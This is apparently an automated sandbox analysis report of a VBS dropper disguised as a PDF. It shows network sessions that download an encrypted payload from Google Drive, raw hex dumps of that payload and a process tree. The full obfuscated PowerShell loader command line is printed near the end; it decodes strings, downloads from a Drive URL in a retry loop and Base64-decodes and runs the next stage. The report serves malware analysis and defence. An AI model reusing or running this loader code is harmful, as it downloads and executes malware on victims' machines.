                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.449733216.58.206.334437812C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-10 20:12:39 UTC258OUTGET /download?id=1OVlUq0BDU-cYs5xvYogyJd5qIDQB1pER&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2025-03-10 20:12:41 UTC5018INHTTP/1.1 200 OK
                                                                                                      X-GUploader-UploadID: AKDAyIum6UmvZRwccOh1CWcWBaQ7KO86VUnIWPXfoRRTORZRS48WYaOdaFkZR7poQuE7YRbaj56qmb4
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Security-Policy: sandbox
                                                                                                      Content-Security-Policy: default-src 'none'
                                                                                                      Content-Security-Policy: frame-ancestors 'none'
                                                                                                      X-Content-Security-Policy: sandbox
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                      Cross-Origin-Resource-Policy: same-site
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Disposition: attachment; filename="gOcBupMV182.bin"
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Credentials: false
                                                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 289344
                                                                                                      Last-Modified: Mon, 10 Mar 2025 07:09:38 GMT
                                                                                                      Date: Mon, 10 Mar 2025 20:12:41 GMT
                                                                                                      Expires: Mon, 10 Mar 2025 20:12:41 GMT
                                                                                                      Cache-Control: private, max-age=0
                                                                                                      X-Goog-Hash: crc32c=7fTZ+A==
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close
                                                                                                      2025-03-10 20:12:41 UTC5018INData Raw: 28 ad 9c 13 b1 fe 31 f6 bf af 2c 07 28 96 2e 04 e7 f4 7d a8 3e 7b 08 fb 3c 41 f1 ff aa 5d 2d 53 58 d8 cc 80 d3 ce e6 11 0a f2 67 39 4a 47 d5 a0 8c 79 ea aa 32 38 07 e5 cd 7d d6 bb 11 e0 b8 f6 b2 0d b8 58 63 66 27 40 f8 82 10 83 9a 08 b6 69 a9 fd d5 ce 84 a0 68 19 c0 b6 67 97 19 dc 85 25 1a fb 86 c7 99 8a 75 e3 5a f3 17 0c 54 b2 95 f0 7a 30 0c 3f 2a fc f7 3d b8 1f a2 f5 df 38 fb 19 e6 7a b4 cb 47 44 c3 9f 21 32 b1 06 d6 89 a2 0f 5f 0b 27 b0 99 e2 3e 7b 6d bc b2 79 d3 6a 76 89 be 81 1e 58 8b 7c 26 f8 1f ae 6e 13 26 e2 9d 6a 87 87 dd 36 f7 e4 ef 5c 20 a2 40 eb a5 69 41 3b ce 93 75 3c c4 96 80 5c 0d f7 b4 0d 40 a0 ad 0b e7 40 2b d9 30 1a 83 a1 85 14 db 0d b9 de 8c cd 2b 75 fa b9 54 9b 5d 8d d6 d1 0a 7b 73 b7 c4 1e c8 56 b9 80 2f 73 8f b9 fd 1f 67 dd bc ce 56
                                                                                                      Data Ascii: (1,(.}>{<A]-SXg9JGy28}Xcf'@ihg%uZTz0?*=8zGD!2_'>{myjvX|&n&j6\ @iA;u<\@@+0+uT]{sV/sgV
                                                                                                      2025-03-10 20:12:42 UTC4660INData Raw: c6 2c cf 28 d8 75 ac c0 a5 b6 fe 6a 97 d0 e7 cb 55 b1 9c e0 a9 de 08 df dd ad b4 1e 21 55 0b ca 56 9b 68 ab 3a ba da 5a 7d 30 73 c9 a1 e4 cc 68 a7 a2 6e 36 11 4b 36 11 fa b1 35 ee 17 00 9e ab eb 4e e0 ef 17 a9 ba 6a e3 ab 91 8d 69 fd 0e de 88 62 d4 47 60 6c a0 bb e2 bb 6a 48 d2 11 0a 3f ed b2 64 1e c8 e3 91 04 a0 63 ae 7a c4 3d b9 9b d5 d1 25 aa 13 50 b3 ab 7d 9b e5 bd 8f 71 2e 11 70 fd c0 29 e0 9c 11 14 3c cc 5e 13 aa e5 dc f5 26 fd 94 8e 95 a1 fb 39 0e c0 fd 2f e0 d8 0f 74 c9 54 7f 3d 41 54 04 10 72 1a c3 16 62 8f 19 60 74 3d 95 13 8a 67 87 9a d7 bf fd cf 2f e3 03 f8 c0 b3 a3 3c 08 d1 15 13 e6 ed 77 2c bf e4 9b 1f 9d 85 22 59 a0 96 4b 14 2e 16 01 ad fa 36 26 91 f1 ed bc 6b 0c 35 dd cb 96 4d b2 6d df 61 91 a7 3e 95 55 45 37 c2 3e f7 dc 65 f8 b3 6d a0 14
                                                                                                      Data Ascii: ,(ujU!UVh:Z}0shn6K65NjibG`ljH?dcz=%P}q.p)<^&9/tT=ATrb`t=g/<w,"YK.6&k5Mma>UE7>em
                                                                                                      2025-03-10 20:12:42 UTC1325INData Raw: 4c e2 d0 f0 7a 3f 89 49 2b fc f7 b6 f4 07 de 7c 2a d4 7e d0 e7 e1 69 c4 47 f0 41 1e 18 f2 b3 81 92 e5 0a de 08 73 07 c0 53 bc 55 ca 3c 26 7b db 48 07 93 2c 0b 48 63 3e 61 7b be 1d 72 3b ba 4d 62 ad ce c1 ab c8 ba 90 50 ac 1a dd 45 86 43 28 2c 2c b5 b0 f6 8e 7f 5f 70 b3 17 17 db c1 d3 fe c6 5c ca f8 fd dd 50 25 46 a9 ac 27 67 39 34 ee 44 56 fb bb f1 a7 11 f2 ca a4 3a 7e 3f 47 69 13 4e 6d bf ed c8 56 82 53 20 3c 5c f1 d8 a2 54 06 c9 96 4f 3f e5 0d 63 a9 c8 e6 8a b0 e8 3c ad f1 29 c5 93 7b 50 f6 f2 31 e5 b6 62 ce 90 e9 a9 28 03 d9 b7 45 c8 fd 6b 8e 0e 79 e2 44 9b 9d a4 d8 38 64 50 83 04 03 65 66 f8 84 6a c6 d8 66 6a 55 b9 8a b7 a9 70 aa 76 25 e7 87 c7 cb 48 4c 1d 96 df 26 fc da 83 28 4f b4 f0 6d 09 8b 2a f7 c9 3e e2 68 37 6f 2e 09 47 08 c7 4b 48 b1 d9 0b 5d
                                                                                                      Data Ascii: Lz?I+|*~iGAsSU<&{H,Hc>a{r;MbPEC(,,_p\P%F'g94DV:~?GiNmVS <\TO?c<){P1b(EkyD8dPefjfjUpv%HL&(Om*>h7o.GKH]
                                                                                                      2025-03-10 20:12:42 UTC1378INData Raw: ac 08 a0 49 41 fc a3 87 6f 23 a3 f8 bf 17 ad fc b3 e3 8c 55 88 39 cc 86 f4 aa 09 94 68 17 da c4 35 89 88 66 5d 4d 20 07 4f cc fc 6d b1 17 da dd d8 76 83 56 10 13 49 af d9 90 b7 c9 e9 cd a2 76 df ee 26 29 52 32 ec e4 df 47 49 4e f8 c9 c6 96 45 c4 a8 9c 4c 70 e5 b1 d4 27 f8 07 d9 46 5f 6c 6f f5 81 ea 70 95 0c ee e2 64 5d af 02 aa d7 89 25 3b ed 48 fc bc ab fc 90 04 dc 71 63 de 99 19 46 e5 20 6b 29 93 df aa 85 28 71 38 b7 1e 8f 9e ab b6 1c ab b2 96 8f 25 f3 64 41 9b 40 c0 73 41 3b c6 48 9b ff 0e 8b 79 97 73 e8 17 7c 58 72 82 68 b0 4c 00 ce 97 53 15 c0 50 03 b3 95 54 a0 6b e4 73 66 87 66 4b 2e 38 d3 44 85 52 aa c3 38 0f a5 9b 88 82 af ef 53 a2 4e 71 1a a6 a6 cc 57 dc c7 2d 03 16 5d 5d e3 a6 24 ab fd c2 2d 0a 55 f7 b6 15 f3 76 90 c6 0f e0 64 90 c5 4a df fb 7d
                                                                                                      Data Ascii: IAo#U9h5f]M OmvVIv&)R2GINELp'F_lopd]%;HqcF k)(q8%dA@sA;Hys|XrhLSPTksffK.8DR8SNqW-]]$-UvdJ}
                                                                                                      2025-03-10 20:12:42 UTC1378INData Raw: f5 20 21 4f a0 83 94 ad ed c9 5d b2 b8 a6 0d ec 24 25 c3 cc 65 18 cf b5 c5 b9 48 38 69 e5 cf d4 2c 09 a5 1e d3 e7 f7 42 50 dd 18 5c fb 1f 7c 7f d3 1d 4a f9 4b a9 15 68 32 ec d6 55 e5 8f a8 e1 dd f9 c5 56 bf 8f 8e 90 37 ba 0a cf 82 e4 41 73 e4 b1 88 ad 33 b0 0d 62 58 c1 56 19 18 09 d8 cf bd c5 41 08 49 76 4e 71 67 97 a9 ef 82 ce ab 65 be 79 2a 60 49 c1 bb 07 6b 35 bd de d6 a2 05 8e 9a 98 17 ce bb 06 f3 0c 1d ce 45 e3 6d 1a 67 0e 47 ec ea b5 90 4b f2 cc c0 4c d4 05 35 a9 92 19 ac c5 c3 a0 db 37 7d 2a 77 5b ce 8b 2b 99 8a 3b e9 17 56 d7 b4 59 9e 44 d9 60 db 3d af 8c 65 6b aa d9 44 12 fa 85 f7 e9 02 b8 84 6f 7d aa f5 d3 d4 93 bb 2c 8b e0 1e b7 21 6f 34 d0 f9 1d 54 60 09 59 67 92 d2 4b 44 fb 77 4d ab eb 1b 4b 49 77 ea 90 aa 09 2f 31 d0 5c fc dd 8a 05 cb 4a 4d
                                                                                                      Data Ascii: !O]$%eH8i,BP\|JKh2UV7As3bXVAIvNqgey*`Ik5EmgGKL57}*w[+;VYD`=ekDo},!o4T`YgKDwMKIw/1\JM
                                                                                                      2025-03-10 20:12:42 UTC1378INData Raw: 5c 3c 7f fc 6f 8b 61 cd 08 cc ee 1c f5 e0 cd 06 ef 22 76 f6 ba d6 12 cb 6c dc 44 a9 6f 42 af ee f8 37 0e a7 44 06 73 65 64 72 63 70 6b ef 9b bf 48 8f 43 3b 07 4f bf dd 60 05 c6 a4 34 0d ef 88 f1 1a f4 42 dd d3 5c 64 64 5e 5d f0 7c 72 fa 7c 45 28 f1 2a 2b 7e 49 18 ba 78 cb 60 c6 c0 d5 73 9f e4 f5 3f 63 3d c4 20 3b fa 84 65 13 60 cf 30 6c 05 ba e5 8d 15 75 65 d4 c7 0d fc 70 fd c9 16 5e 37 bb 01 f7 fb fd f8 ed 8e 58 f1 ec 7f 2e 76 52 09 02 e9 3c ec 30 8b ba 6e 11 1e 1f 47 e4 73 1e 67 c2 0e b0 e6 48 dd f5 16 d9 5b dc 01 2d ab 66 59 ff 71 4a f2 46 94 2f e4 0f ce 4e 45 f4 ee 74 42 f3 e1 8b a6 27 12 2a 0c 5c ab ad e1 2f 56 87 2c c9 fb 52 c6 c4 b8 60 54 50 bb 7e 5e 42 02 b5 04 0d 68 69 22 fc 68 53 da 4d 4b 57 48 29 34 c3 8d 77 4a c7 3f d5 a1 d2 6f f1 68 b1 ef 46
                                                                                                      Data Ascii: \<oa"vlDoB7DsedrcpkHC;O`4B\dd^]|r|E(*+~Ix`s?c= ;e`0luep^7X.vR<0nGsgH[-fYqJF/NEtB'*\/V,R`TP~^Bhi"hSMKWH)4wJ?ohF
                                                                                                      2025-03-10 20:12:42 UTC1378INData Raw: f6 5b 8c 0f 1d f9 2f 4e cc da b7 42 98 87 f0 2f 87 9b 7d 28 d2 df da 1c 6e 33 41 7e 5c 9a 79 83 79 55 db 29 aa 24 9b b4 4f 01 b5 fa 67 c2 05 b5 b1 2c b6 0f 8a d4 bd 50 a9 d4 c8 c1 be 33 0a 11 04 4a 75 56 29 0b 99 cc 68 f3 84 29 5f de a6 56 56 32 d9 77 1f 9d 1c fa 85 73 c8 e3 48 59 f3 64 4c 46 d2 29 4c 94 9a f7 5e fd 3e 42 f5 80 d3 2c 7a 19 d4 3a cf f6 0b f4 51 20 d1 f1 ba 38 cb 95 1f b7 9e 6f c4 3c a6 7c e2 e6 f4 8a 02 e0 5f b3 92 5a de 13 88 0a ac 70 62 c0 b6 22 cb 41 b1 93 72 78 6e 81 eb de 4d 14 85 8a e7 40 a8 11 35 21 e5 72 b9 b5 9f ce c5 4b 3b 67 41 df 73 73 b9 8c d3 28 20 55 8f 7a 9e 36 17 3e 99 ea 35 d7 83 88 7a 36 b4 87 8f ae 3a 1c cf 0a 16 f3 07 92 44 d4 d9 27 43 b9 67 86 21 56 5d 15 b6 04 6a a4 2f 4c 9c 9d 95 b7 46 d0 24 f4 de 99 83 97 82 b8 bc
                                                                                                      Data Ascii: [/NB/}(n3A~\yyU)$Og,P3JuV)h)_VV2wsHYdLF)L^>B,z:Q 8o<|_Zpb"ArxnM@5!rK;gAss( Uz6>5z6:D'Cg!V]j/LF$
                                                                                                      2025-03-10 20:12:42 UTC1378INData Raw: 9b 5c d8 ed c4 0f 32 da f2 3c db 89 94 9e a3 6c 92 69 df da f3 1c 1e e7 be 88 df 97 fe c7 4f 7e c6 bf b2 48 73 51 e7 92 08 12 e6 ad dd b8 15 56 3f 57 fd 4a 3e 7a 8b ac d1 8f c7 ee 02 1a c4 38 ed bc 45 22 45 32 17 4b 40 38 00 4f 01 84 81 8e 53 cb d7 ae a1 bb 14 57 24 71 59 1c 45 91 8e 2c a7 71 b2 9d 80 69 14 78 12 13 32 16 d8 27 bf 3d 7e 0c bb fd 52 60 f9 56 e6 6a b2 37 8c a3 fe 92 f9 e5 b6 2d 1b 9a 04 62 eb 0b f5 2d fd ae cf 19 6f 45 0a 63 b0 b0 01 82 a1 27 3b c8 83 74 ab de f3 bd 6c a6 63 f8 83 56 45 b2 6a 3a 9d b8 c8 4b 2c a6 87 86 e5 0a ea ff ef 8a 3e db 1c ef cc 88 e4 4c 29 49 4c 1b 49 d7 4a 8d 02 ef df 1c 91 38 ca 46 c4 1b e8 fb 14 41 3b 23 80 2b 76 88 66 9d 29 0f 48 f8 bf e6 6b c5 a5 f1 ef 85 de 78 04 25 6d bc 0d 00 9c 50 ba 55 b8 18 70 61 5e ff 26
                                                                                                      Data Ascii: \2<liO~HsQV?WJ>z8E"E2K@8OSW$qYE,qix2'=~R`Vj7-b-oEc';tlcVEj:K,>L)ILIJ8FA;#+vf)Hkx%mPUpa^&
                                                                                                      2025-03-10 20:12:42 UTC1378INData Raw: 00 2e 5d 6f 57 10 3e dd 65 1f 92 54 6e 3c 10 82 40 1f 4a bf 84 26 f3 b6 5c f9 0e 50 63 bf a7 3a 99 5b b6 d9 c5 fc 23 19 27 3d bc b1 46 b0 a7 ba 51 83 a4 33 72 9e 70 c6 ee bb ab 68 95 3b 36 78 be 1d cb 13 1d 49 34 73 29 94 47 48 bb 5c b6 2c bc a8 52 98 4b b2 03 c0 1a 5f aa ef 78 94 2e 2b bc 45 e5 06 cc e9 77 ca 6e cc b1 2a 20 69 51 d4 a2 a6 c9 ea 8a 36 05 3a 7e de bf 44 5b 22 f5 17 8d f5 02 ff 5a d6 eb 29 19 d3 6f 17 7f ba 3d 6e db 98 7c 6f f5 e3 a0 1e 06 83 76 08 79 35 f5 46 d6 fe 5a 68 79 43 fe 76 c3 f3 c3 0c 0b c7 5c fa cc 0c 5f b0 15 06 0f 38 71 d5 0b 53 6e 8e c3 04 ff 31 36 c5 be ac 31 05 e1 b2 ac 4c 8d d7 6d ca 1b 72 ab 77 5f 86 1f 13 8f 3c 59 a0 6f b7 61 12 92 9d b8 64 91 90 c1 14 1e f6 1a 3f b3 0d 60 1d 21 e1 ad 0a 27 ee 67 1a 5c 65 6d 79 33 a2 bc
                                                                                                      Data Ascii: .]oW>eTn<@J&\Pc:[#'=FQ3rph;6xI4s)GH\,RK_x.+Ewn* iQ6:~D["Z)o=n|ovy5FZhyCv\_8qSn161Lmrw_<Yoad?`!'g\emy3
                                                                                                      2025-03-10 20:12:42 UTC1378INData Raw: 94 40 d6 28 b1 33 e8 d3 31 0c 76 3c 24 5d f5 43 fa 28 cb 04 6e e1 27 78 20 9a aa 83 0d 05 9d 53 1a c0 6a bd cd 34 72 93 ba 5b a8 19 86 2d d9 a6 ce 38 db af 40 72 ad 0b ac 86 f7 39 da 18 5c 87 61 0d 2e bd af c9 0f 37 c5 13 14 96 06 5a 8b 40 77 a0 cf 1b 65 a5 43 f1 f3 80 07 b1 e6 ee 0d cf b7 9e 78 3f a4 d2 9f c6 d0 7d 62 5a f5 88 4e fe b0 55 35 07 3b c0 5a 6d b4 c0 86 5e 16 ed 64 d0 a9 42 83 87 49 97 41 ea 8d 61 b0 e7 fe 6c 18 df 12 6d 53 7b 5d b9 2b 41 bd 24 69 5a 4c 1e f8 45 79 69 26 cd ff 66 82 ff 27 a7 53 c5 89 06 ca 65 06 10 af 89 cc 7b fb 9d 04 63 f8 9c 9e 36 81 a9 13 0d d0 77 42 54 dd 41 f1 df 13 7a b7 7d 82 98 bc 4b b0 9e 7a 36 db ba f6 29 18 bf 5f 6b 45 14 fd 8a 9c 3a 21 f9 63 91 49 03 59 ae 90 c4 3f e8 33 3d f8 dd ae 9e 00 00 ee 7d 59 6d 9b 2d e1
                                                                                                      Data Ascii: @(31v<$]C(n'x Sj4r[-8@r9\a.7Z@weCx?}bZNU5;Zm^dBIAalmS{]+A$iZLEyi&f'Se{c6wBTAz}Kz6)_kE:!cIY?3=}Ym-


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:16:11:20
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs"
                                                                                                      Imagebase:0x7ff6581b0000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:16:11:21
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:ping Host_6637.6637.6637.657e
                                                                                                      Imagebase:0x7ff709d70000
                                                                                                      File size:22'528 bytes
                                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:16:11:21
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff62fc20000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:16:11:22
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens 'Togg$stemKLangn R nuSll.sparae,artlPocksUr.kkIodoedundn SysdSamteParasA,um.Tre HNgomePelvaFjlldJolle ,trr rys F r[Trum$PillPm.ssaChipaContbHoloe xcog hadyju andykkd RepeTryglUnvis FlueSpatrRappsAnis]Bedr= E t$Dopifsh eoUnberGravlTylvnBevogOvereRe nr kllF rle Defd nfenCl piFremnScapgPre,e Supn');$Aggrades107=Sinterens 'Subc$.ortKIraknId.auBeras voe ootl UunsAdvokSkyde SypnD nidIsole BrosSino.FlerD PeaoMeg wUdgrnRaaklKon o cooa Cagd.porF AnaiScholBathe See(Flet$Fld F Beai Paeb VilrstapoEp tmRepry ocx agoSubpsFi.aaUnderRadicinteoParlmGrueaSil,, ans$Popuo RatpR prsstame .nkn arpdpr.ceoper)';$opsende=$Afkrfter;Bldagtigeres (Sinterens 'U lo$ orsgPropl.apno ParbFlowa K sLNonf:FootoHvniLUnstIFra g ncooH,anS ErhACla c unc KonhOktaa,aciR .nfisemiD .anE erpsGrun=Coll(Bl kTKa tEPaa.S DoutSla -Basip eoa BamTsejlH onp Toph$Spelovarip.onrsAdrtEVindNArtoDSlurePitt)');while (!$Oligosaccharides) {Bldagtigeres (Sinterens 'Rull$EkspgPla lF ldoG ifb St aDeltl ,il: WayS nauF erbG upsChimt Spea.nehnRenotUd oiOmniaCholbCo ylOve eSabb=Pl t$InsaSErytyKon nEl ktGemmaAchrk.ormsChema Vaan allaRebol,nreyEnnesUncoeValgr,oodeBeslr') ;Bldagtigeres $Aggrades107;Bldagtigeres (Sinterens 'P pe[RadiTViskHReciRMe.nE inaAUndedStapIBoksnButyg Sko.,astT SepH VanRGenteGtesASn pDAger] Un,:Mere: P.rSUnisLFormePeriES.isPBegi(Omgr4Zoog0 Red0Fire0Hvir)');Bldagtigeres (Sinterens 'brne$LysgGPe ll MenO.eglbSvinAInv,l Her:UmagoMen l DriIFjerG Brao TenSSar,A HerCSladCb azHFir.aE enR Teai,uffDPaneesrafsPaah=brid( Gr,TStikeN tas entt Mis-ModfPMaddATriftv,gthover Ufor$BlddO Fo,P HeaSmusheDadaNDetadLaseEOd n)') ;Bldagtigeres (Sinterens 'Regu$ G.eGFejllG seO F ibDefoAPr.nlSpon:DevatPolyaPhlegPer,u CerNUndedFodbe ,ndr IcesR,meTPseur LegY UbegTry,nCantIgustn MarGF od=Varm$ MisgArvelneuro.ootb odeaMediL Byc:Wel.U ,utRProtE MandhundEM skLHugoiAparGBrodHNatueGutwdMounECat.R R.b+Tr.k+Pl a%Lave$Opv U RygDUndefFu.gLAv.ceCruiTStubnVeksiKaldnElecgB.sweAutoRsam n hacEHoro.DetecUnegoF ofu Ch NAnict') ;$Fibromyxosarcoma=$Udfletningerne[$Tagunderstrygning]}$Schoolboyhood=362868;$Videresalget=30413;Bldagtigeres (Sinterens 'Pent$RetsG MillSnoooS ntbFlkkaSpytLDec,:.edlu s vfkugerInteiSaavV f aI rrlB azL ohni KorgScu eNona Over=Inte .npoGPetaeNangtBack- HalCDisio verNByggtU faetrann ejtPoly Nigr$.onoOPostP.olisHoveELibrnhypsdVal,e');Bldagtigeres (Sinterens 'Blre$ Hy,g ,unlGingoPh,lb Ra,a Bryl,lut:BesmCtetrhUd riMerckPostePundeDive Text=Me.n Wels[ yseS Squy Syms vertCy.leTr.lm Red.Fa uC DikoNon n UtevScroeK,slrByortPara]Utop:Draa:S loFGuilrSpl,oKonsm Ba,BBra,a Ch s,ulieIm l6Klag4UdlbS Ampt S yr amiOp,inTryggAto (Mose$LiniUEksefSpunrForei SkrvNon iJo klForul ordi langSky eKvat)');Bldagtigeres (Sinterens 'Liq $AktigAfhoLCynoo M,lbFortANe klOver: U psLoweCPurbhbaciIForeL AdvLU,rae orrR KomfabsoeBldelEntrSFara1embo6Quie9Syst Hyg=Dec Du.t[ PrisReciYLibeSNonsTSaltEZoolM fs.fo stInsteOpdaXPre TSoci. D yESkimN DowcTre O onDModuiEmann Hjeg Und] Pru:Ultr:EtolaSoj STranCTofuIcouniPro,.ShaugSupeEHausTNu sSVaniTUnshrBlu,IChorNU poG egi( nke$ RefCFineH ProiO teKkltreMo.oeLang)');Bldagtigeres (Sinterens 'Hjer$ SkugPendlVicao T ubEldiAS halBigo:Me aAExo,GUdskRFor oBergbAut A S rCSleetRaciE.tepRSkrhISquauUn.omKa e=Sarc$ov rST.skc Fo HSonsiFi aLak llMusteSterRUnpofappeeForsLFridsMi h1v,ld6Leni9C ld.ForrSSubpuUpgrbwaggs p etVe orHis II.stNVagtGCl,i(Lyd $BumpsRiftcSkufhS,rmoSnowOSt ml Ro BDiskOIndiym.lih RenOS.raOClicdEstr,Unfe$Overv SulIComadSkrdESgetRSydfeLnnesFrerAVexil JurGSt mE EneTGly )');Bldagtigeres $agrobacterium;"
